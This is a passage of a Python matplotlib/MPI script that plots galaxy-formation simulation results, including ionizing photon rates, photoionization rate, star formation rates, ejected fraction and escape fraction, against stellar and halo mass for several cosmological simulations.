collect_across_tasks(mean_Ngamma_galaxy, std_Ngamma_galaxy, N_Ngamma_galaxy,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
if rank == 0:
if paper_plots == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
else:
fig, ax = plt.subplots(nrows=2, ncols=2, sharex='col', sharey='row', figsize=(16, 6))
delta_fontsize = 0
caps = 5
ewidth = 1.5
z_tags = np.zeros_like(model_tags, dtype=np.float32)
for model_number in range(0, len(SnapList)):
count_x = 0
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
plot_count = 0
for count, snapshot_idx in enumerate(range(0, len(SnapList[model_number]))):
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
if count == 2:
count_x += 1
label = model_tags[model_number]
z_tags[count] = float(AllVars.SnapZ[SnapList[model_number][snapshot_idx]])
## Plots as a function of stellar mass ##
w = np.where((master_N_Ngamma_stellar[model_number][snapshot_idx] < 4))[0] # If there are no galaxies in the bin we don't want to plot.
master_mean_Ngamma_stellar[model_number][snapshot_idx][w] = np.nan
if paper_plots == 0:
ax1.plot(master_bin_middle_stellar[model_number][snapshot_idx],
np.log10(master_mean_Ngamma_stellar[model_number][snapshot_idx]*1.0e50),
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
else:
ax[count_x, count%2].plot(master_bin_middle_stellar[model_number][snapshot_idx],
np.log10(master_mean_Ngamma_stellar[model_number][snapshot_idx]*1.0e50),
color = PlotScripts.colors[model_number],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
## Stellar Mass plots ##
if paper_plots == 0:
adjust_stellarmass_plot(ax1)
else:
adjust_paper_plots(ax, z_tags)
leg = ax[0,0].legend(loc="upper left", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
plt.tight_layout()
plt.subplots_adjust(wspace = 0.0, hspace = 0.0)
## Output ##
outputFile = './%s%s' %(output_tag, output_format)
fig.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig)
##
def plot_photo_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_photo_galaxy, std_photo_galaxy, N_photo_galaxy,
model_tags, paper_plots, output_tag):
"""
Plots the photoionization rate as a function of galaxy stellar mass.
Parallel compatible.
Accepts 3D arrays of the escape fraction binned into Stellar Mass bins to plot the escape fraction for multiple models.
Mass units are log(Msun)
Parameters
---------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model.
simulation_norm : array with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
5 : Kali
mean_photo_galaxy, std_photo_galaxy, N_photo_galaxy : Nested
3-dimensional array, mean_photo_galaxy[model_number0][snapshot0] =
[bin0_meanphoto, ..., binN_meanphoto], with length equal to the number of models.
Mean/Standard deviation for Photionization Rate in each stellar mass
bin, for each [model_number] and [snapshot_number]. N_photo_galaxy is
the number of galaxies placed into each mass bin.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
paper_plots: Integer.
Flag to denote whether we should plot a full, 4 panel plot for the
RSAGE paper.
output_tag : string
Name of the file that will be generated.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Mass units are log(Msun).
Ngamma units are 1.0e50 photons/s.
"""
def adjust_stellarmass_plot(ax):
ax.set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\mathbf{log_{10} \: \Gamma \: [s^{-1}}$',
size = PlotScripts.global_labelsize)
ax.set_xlim([4.8, 10])
#ax.set_ylim([0.05, 0.45])
ax.xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
#ax.yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax.tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax.tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax.tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax.spines[axis].set_linewidth(PlotScripts.global_axiswidth)
#tick_locs = np.arange(4.0, 11.0)
#ax.set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(0.0, 0.80, 0.10)
#ax.set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
'''
labels = ax.yaxis.get_ticklabels()
locs = ax.yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
'''
leg = ax.legend(loc="lower right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
print("Plotting photoionization rate as a function of stellar mass.")
## Array initialization ##
master_mean_photo_stellar, master_std_photo_stellar, master_N_photo_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_photo_galaxy, std_photo_galaxy, N_photo_galaxy,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
if rank == 0:
if paper_plots == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
else:
pass
for model_number in range(0, len(SnapList)):
count_x = 0
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
plot_count = 0
for count, snapshot_idx in enumerate(range(0, len(SnapList[model_number]))):
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
if (model_number == 0):
label = r"$\mathbf{z = " + \
str(int(round(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]))) +\
"}$"
else:
label = ""
## Plots as a function of stellar mass ##
w = np.where((master_N_photo_stellar[model_number][snapshot_idx] < 4))[0] # If there are no galaxies in the bin we don't want to plot.
master_mean_photo_stellar[model_number][snapshot_idx][w] = np.nan
if paper_plots == 0:
ax1.plot(master_bin_middle_stellar[model_number][snapshot_idx],
np.log10(master_mean_photo_stellar[model_number][snapshot_idx]),
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
else:
pass
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
for model_number in range(0, len(SnapList)):
ax1.plot(np.nan, np.nan, color = 'k',
label = model_tags[model_number],
lw = PlotScripts.global_linewidth,
ls = PlotScripts.linestyles[model_number])
## Stellar Mass plots ##
if paper_plots == 0:
adjust_stellarmass_plot(ax1)
else:
pass
## Output ##
outputFile = './%s%s' %(output_tag, output_format)
fig.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig)
##
##
def plot_sfr_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_galaxy_sfr, std_galaxy_sfr,
mean_galaxy_ssfr, std_galaxy_ssfr,
N_galaxy, model_tags, output_tag):
"""
Plots the specific star formation rate (sSFR) as a function of stellar mass.
Parallel compatible.
Accepts 3D arrays of the sSFR binned into Stellar Mass bins.
Mass units log(Msun).
Parameters
---------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model.
simulation_norm : array with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
5 : Kali
mean_galaxy_ssfr, std_galaxy_ssfr, N_galaxy_ssfr : Nested 3-dimensional array,
mean_galaxy_sfr[model_number0][snapshot0] = [bin0_meanssfr, ..., binN_meanssfr],
with length equal to the number of models.
Mean/Standard deviation for sSFR in each stellar mass bin, for each [model_number] and [snapshot_number].
N_galaxy_fesc is the number of galaxies placed into each mass bin.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
output_tag : string
Name of the file that will be generated.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Mass units are 1e10 Msun (no h).
"""
def adjust_sfr_plot(ax):
ax.set_xlabel(r'$\log_{10}\ M_*\ [M_{\odot}]$',
size = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\mathbf{\langle \mathrm{SFR}\rangle_{M_*}\:[M_\odot\mathrm{yr}^{-1}]}$',
size = PlotScripts.global_labelsize)
ax.set_xlim([4.8, 10])
ax.set_ylim([-3, 2])
ax.xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax.yaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax.tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax.tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax.tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax.spines[axis].set_linewidth(PlotScripts.global_axiswidth)
tick_locs = np.arange(6.0, 11.0)
ax.set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(0.0, 0.80, 0.10)
#ax.set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
labels = ax.yaxis.get_ticklabels()
locs = ax.yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
leg = ax.legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
def adjust_ssfr_plot(ax):
ax.set_xlabel(r'$\log_{10}\ M_*\ [M_{\odot}]$',
size = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\mathbf{\langle\mathrm{sSFR}\rangle_{M_*}\:[\mathrm{yr^{-1}}}$',
size = PlotScripts.global_labelsize)
ax.set_xlim([4.8, 10])
ax.set_ylim([-9, -4])
ax.xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax.yaxis.set_minor_locator(mtick.MultipleLocator(0.1))
ax.tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax.tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax.tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax.spines[axis].set_linewidth(PlotScripts.global_axiswidth)
tick_locs = np.arange(6.0, 11.0)
ax.set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(0.0, 0.80, 0.10)
#ax.set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
labels = ax.yaxis.get_ticklabels()
locs = ax.yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
leg = ax.legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
print("Plotting sSFR as a function of stellar mass.")
## Array initialization ##
master_mean_sfr_stellar, master_std_sfr_stellar, master_N_sfr_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_galaxy_sfr, std_galaxy_sfr, N_galaxy,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
master_mean_ssfr_stellar, master_std_ssfr_stellar, master_N_ssfr_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_galaxy_ssfr, std_galaxy_ssfr, N_galaxy,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
if rank == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
for model_number in range(0, len(SnapList)):
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
plot_count = 0
for snapshot_idx in range(0, len(SnapList[model_number])):
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
if (model_number == 0):
label = r"$\mathbf{z = " + \
str(int(round(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]))) +\
"}$"
else:
label = ""
## Plots as a function of stellar mass ##
ax1.plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_sfr_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
ax2.plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_ssfr_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
#for model_number in range(0, len(SnapList)): # Just plot some garbage to get the legend labels correct.
#ax1.plot(np.nan, np.nan, color = 'k', linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = model_tags[model_number], linewidth = PlotScripts.global_linewidth)
#ax3.plot(np.nan, np.nan, color = 'k', linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = model_tags[model_number], linewidth = PlotScripts.global_linewidth)
## Stellar Mass plots ##
adjust_sfr_plot(ax1)
adjust_ssfr_plot(ax2)
## Output ##
outputFile = "./{0}SFR{1}".format(output_tag, output_format)
fig.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
outputFile = "./{0}sSFR{1}".format(output_tag, output_format)
fig2.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig)
##
##
def plot_fej_Ngamma(SnapList, PlotSnapList, simulation_norm,
mean_Ngamma_fej, std_Ngamma_fej,
N_fej, model_tags, output_tag):
def adjust_plot(ax):
ax.set_xlabel(r'$\mathbf{f_\mathrm{ej}}$',
size = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\mathbf{\log_{10}\langle N_\gamma\rangle_{f_{ej}}}$',
size = PlotScripts.global_labelsize)
ax.set_xlim([0.0, 1.0])
#ax.set_ylim([0.05, 0.45])
#ax.axhline(0.35, 0, 100, color ='k', linewidth = PlotScripts.global_linewidth, linestyle = '-.')
#ax.text(9.1, 0.37, r"$f_\mathrm{esc} = 0.35$", color = 'k',
# size = PlotScripts.global_fontsize)
ax.xaxis.set_minor_locator(mtick.MultipleLocator(0.10))
#ax.yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax.tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax.tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax.tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax.spines[axis].set_linewidth(PlotScripts.global_axiswidth)
#tick_locs = np.arange(6.0, 11.0)
#ax.set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(0.0, 0.80, 0.10)
#ax.set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
labels = ax.xaxis.get_ticklabels()
locs = ax.xaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
leg = ax.legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
## Array initialization ##
master_mean_Ngamma_fej, master_std_Ngamma_fej, master_N_Ngamma_fej, master_bin_middle_fej = \
collect_across_tasks(mean_Ngamma_fej, std_Ngamma_fej, N_fej,
SnapList, PlotSnapList, True, fej_low, fej_high,
fej_bin_width)
if rank == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax2 = ax1.twinx()
for model_number in range(0, len(SnapList)):
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
plot_count = 0
for snapshot_idx in range(0, len(SnapList[model_number])):
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
label = model_tags[model_number]
w = np.where((master_N_Ngamma_fej[model_number][snapshot_idx] < 4))[0] # If there are no galaxies in the bin we don't want to plot.
master_mean_Ngamma_fej[model_number][snapshot_idx][w] = np.nan
ax1.plot(master_bin_middle_fej[model_number][snapshot_idx],
np.log10(master_mean_Ngamma_fej[model_number][snapshot_idx]*1.0e50),
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
#ax1.plot(master_bin_middle_fej[model_number][snapshot_idx],
# np.log10(master_mean_Ngamma_fej[model_number][snapshot_idx]*1.0e50
# * master_N_Ngamma_fej[model_number][snapshot_idx]),
# color = PlotScripts.colors[plot_count],
# ls = PlotScripts.linestyles[model_number],
# rasterized = True, label = label,
#lw = PlotScripts.global_linewidth)
'''
ax2.plot(master_bin_middle_fej[model_number][snapshot_idx],
np.log10(master_N_Ngamma_fej[model_number][snapshot_idx]),
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
'''
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
adjust_plot(ax1)
leg = ax1.legend(loc="upper center", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
plt.tight_layout()
## Output ##
outputFile = './%s%s' %(output_tag, output_format)
fig.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig)
def plot_ejectedfraction(SnapList, PlotSnapList, simulation_norm, mean_mvir_ejected,
std_mvir_ejected, N_ejected, mean_ejected_z,
std_ejected_z, N_z, model_tags, output_tag):
'''
Plots the ejected fraction as a function of the halo mass.
Parallel compatible.
Accepts a 3D array of the ejected fraction so we can plot for multiple models and redshifts.
Parameters
---------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model.
mean_mvir_ejected, std_mvir_ejected, N_ejected : Nested 3-dimensional array, mean_mvir_ejected[model_number0][snapshot0] = [bin0_meanejected, ..., binN_meanejected], with length equal to the number of models.
Mean/Standard deviation for the escape fraction binned into Halo Mass bins. N_ejected is the number of data points in each bin. Bounds are given by 'm_low' and 'm_high' in bins given by 'bin_width'.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
output_tag : string
Name of the file that will be generated.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Halo Mass is in units of log10(Msun).
'''
print("Plotting the Ejected Fraction as a function of halo mass.")
master_mean_ejected_halo, master_std_ejected_halo, master_N_ejected_halo, master_bin_middle_halo = \
collect_across_tasks(mean_mvir_ejected, std_mvir_ejected, N_ejected, SnapList,
PlotSnapList, True, m_low, m_high)
master_mean_ejected_z, master_std_ejected_z, master_N_ejected_z, _ = \
collect_across_tasks(mean_ejected_z, std_ejected_z, N_z, SnapList)
if rank == 0:
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
for model_number in range(0, len(SnapList)):
if(simulation_norm[model_number] == 1):
cosmo = AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
cosmo = AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
cosmo = AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
cosmo = AllVars.Set_Params_Kali()
for snapshot_idx in range(0, len(PlotSnapList[model_number])):
label = AllVars.SnapZ[PlotSnapList[model_number][snapshot_idx]]
ax1.plot(master_bin_middle_halo[model_number][snapshot_idx],
master_mean_ejected_halo[model_number][snapshot_idx],
color = PlotScripts.colors[snapshot_idx],
linestyle = PlotScripts.linestyles[model_number],
label = label, lw = PlotScripts.global_linewidth)
ax2.plot((AllVars.t_BigBang - AllVars.Lookback_Time[SnapList[model_number]]) * 1.0e3,
master_mean_ejected_z[model_number],
color = PlotScripts.colors[model_number],
label = model_tags[model_number],
ls = PlotScripts.linestyles[model_number],
lw = PlotScripts.global_linewidth)
for model_number in range(0, len(SnapList)): # Just plot some garbage to get the legend labels correct.
ax1.plot(np.nan, np.nan, color = 'k', linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = model_tags[model_number], linewidth = PlotScripts.global_linewidth)
ax1.set_xlabel(r'$\log_{10}\ M_{\mathrm{vir}}\ [M_{\odot}]$', size = PlotScripts.global_fontsize)
ax1.set_ylabel(r'$\mathrm{Ejected \: Fraction}$', size = PlotScripts.global_fontsize)
ax1.set_xlim([8.0, 12])
ax1.set_ylim([-0.05, 1.0])
ax1.xaxis.set_minor_locator(mtick.MultipleLocator(0.1))
ax1.yaxis.set_minor_locator(mtick.MultipleLocator(0.025))
leg = ax1.legend(loc=1, numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
outputFile = "./{0}{1}".format(output_tag, output_format)
fig1.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig1)
ax2.set_xlabel(r"$\mathbf{Time \: since \: Big \: Bang \: [Myr]}$", fontsize = PlotScripts.global_labelsize)
tick_locs = np.arange(200.0, 1000.0, 100.0)
tick_labels = [r"$\mathbf{%d}$" % x for x in tick_locs]
ax2.xaxis.set_major_locator(mtick.MultipleLocator(100))
ax2.set_xticklabels(tick_labels, fontsize = PlotScripts.global_fontsize)
ax2.set_xlim(PlotScripts.time_xlim)
ax2.set_ylabel(r'$\mathbf{Mean f_{ej}}$', fontsize = PlotScripts.global_labelsize)
ax3 = ax2.twiny()
t_plot = (AllVars.t_BigBang - cosmo.lookback_time(PlotScripts.z_plot).value) * 1.0e3 # Corresponding Time values on the bottom.
z_labels = ["$\mathbf{%d}$" % x for x in PlotScripts.z_plot] # Properly Latex-ize the labels.
ax3.set_xlabel(r"$\mathbf{z}$", fontsize = PlotScripts.global_labelsize)
ax3.set_xlim(PlotScripts.time_xlim)
ax3.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax3.set_xticklabels(z_labels, fontsize = PlotScripts.global_fontsize) # But label them as redshifts.
leg = ax2.legend(loc='lower right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile2 = "./{0}_z{1}".format(output_tag, output_format)
fig2.savefig(outputFile2, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile2))
plt.close(fig2)
##
def plot_mvir_fesc(SnapList, mass_central, fesc, model_tags, output_tag):
title = []
redshift_labels = []
mean_fesc_array = []
std_fesc_array = []
mean_halomass_array = []
std_halomass_array = []
bin_middle_array = []
for model_number in range(0, len(SnapList)):
redshift_labels.append([])
mean_fesc_array.append([])
std_fesc_array.append([])
mean_halomass_array.append([])
std_halomass_array.append([])
bin_middle_array.append([])
print("Plotting fesc against Mvir")
binwidth = 0.1
Frequency = 1
for model_number in range(0, len(SnapList)):
for snapshot_idx in range(0, len(SnapList[model_number])):
print("Doing Snapshot {0}".format(SnapList[model_number][snapshot_idx]))
tmp = 'z = %.2f' %(AllVars.SnapZ[SnapList[model_number][snapshot_idx]])
redshift_labels[model_number].append(tmp)
minimum_mass = np.floor(min(mass_central[model_number][snapshot_idx])) - 10*binwidth
maximum_mass = np.floor(max(mass_central[model_number][snapshot_idx])) + 10*binwidth
minimum_mass = 6.0
maximum_mass = 12.0
binning_minimum = comm.allreduce(minimum_mass, op = MPI.MIN)
binning_maximum = comm.allreduce(maximum_mass, op = MPI.MAX)
halomass_nonlog = [10**x for x in mass_central[model_number][snapshot_idx]]
(mean_fesc, std_fesc, N, bin_middle) = AllVars.Calculate_2D_Mean(mass_central[model_number][snapshot_idx], fesc[model_number][snapshot_idx], binwidth, binning_minimum, binning_maximum)
mean_fesc_array[model_number], std_fesc_array[model_number] = calculate_pooled_stats(mean_fesc_array[model_number], std_fesc_array[model_number], mean_fesc, std_fesc, N)
mean_halomass_array[model_number], std_halomass_array[model_number] = calculate_pooled_stats(mean_halomass_array[model_number], std_halomass_array[model_number], np.mean(halomass_nonlog), np.std(halomass_nonlog), len(mass_central[model_number][snapshot_idx]))
## If want to do mean/etc of halo mass need to update script. ##
bin_middle_array[model_number].append(bin_middle)
mean_halomass_array[model_number] = np.log10(mean_halomass_array[model_number])
if rank == 0:
f = plt.figure()
ax1 = plt.subplot(111)
for model_number in range(0, len(SnapList)):
for snapshot_idx in range(0, len(SnapList[model_number])):
if model_number == 0:
title = redshift_labels[model_number][snapshot_idx]
else:
title = ''
mean = mean_fesc_array[model_number][snapshot_idx]
std = std_fesc_array[model_number][snapshot_idx]
bin_middle = bin_middle_array[model_number][snapshot_idx]
ax1.plot(bin_middle, mean, color = colors[snapshot_idx], linestyle = linestyles[model_number], rasterized = True, label = title)
#ax1.scatter(mean_halomass_array[model_number][snapshot_idx], np.mean(~np.isnan(mean)), color = colors[snapshot_idx], marker = 'o', rasterized = True, s = 40, lw = 3)
if (len(SnapList) == 1):
ax1.fill_between(bin_middle, np.subtract(mean,std), np.add(mean,std), color = colors[snapshot_idx], alpha = 0.25)
ax1.set_xlabel(r'$\log_{10}\ M_{\mathrm{vir}}\ [M_{\odot}]$', size = PlotScripts.global_fontsize)
ax1.set_ylabel(r'$f_\mathrm{esc}$', size = PlotScripts.global_fontsize)
#ax1.set_xlim([8.5, 12])
#ax1.set_ylim([0.0, 1.0])
ax1.xaxis.set_minor_locator(mtick.MultipleLocator(0.1))
# ax1.yaxis.set_minor_locator(mtick.MultipleLocator(0.1))
# ax1.set_yscale('log', nonposy='clip')
# for model_number in range(0, len(SnapList)):
# ax1.plot(1e100, 1e100, color = 'k', ls = linestyles[model_number], label = model_tags[model_number], rasterized=True)
leg = ax1.legend(loc='upper left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
outputFile = './' + output_tag + output_format
plt.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to'.format(outputFile))
plt.close()
##
def plot_mvir_Ngamma(SnapList, mean_mvir_Ngamma, std_mvir_Ngamma, N_Ngamma, model_tags, output_tag,fesc_prescription=None, fesc_normalization=None, fitpath=None):
'''
Plots the number of ionizing photons (pure ngamma times fesc) as a function of halo mass.
Parallel compatible.
The input data has been binned as a function of halo virial mass (Mvir), with the bins defined at the top of the file (m_low, m_high, bin_width).
Accepts 3D arrays to plot ngamma for multiple models.
Parameters
----------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model.
mean_mvir_Ngamma, std_mvir_Ngamma, N_Ngamma : Nested 2-dimensional array, mean_mvir_Ngamma[model_number0][snapshot0] = [bin0_meanNgamma, ..., binN_meanNgamma], with length equal to the number of bins.
Mean/Standard deviation/number of data points in each halo mass (Mvir) bin.
The number of photons is in units of 1.0e50 s^-1.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
output_tag : string
Name of the file that will be generated.
fesc_prescription : int (optional)
If this parameter is defined, we will save the Mvir-Ngamma results in a text file (not needed if not saving).
Number that controls what escape fraction prescription was used to generate the escape fractions.
0 : Constant, fesc = Constant.
1 : Scaling with Halo Mass, fesc = A*Mh^B.
2 : Scaling with ejected fraction, fesc = fej*A + B.
fesc_normalization : float (if fesc_prescription == 0) or `numpy.darray' with length 2 (if fesc_prescription == 1 or == 2) (optional).
If this parameter is defined, we will save the Mvir-Ngamma results in a text file (not needed if not saving).
Parameter not needed if you're not saving the Mvir-Ngamma results.
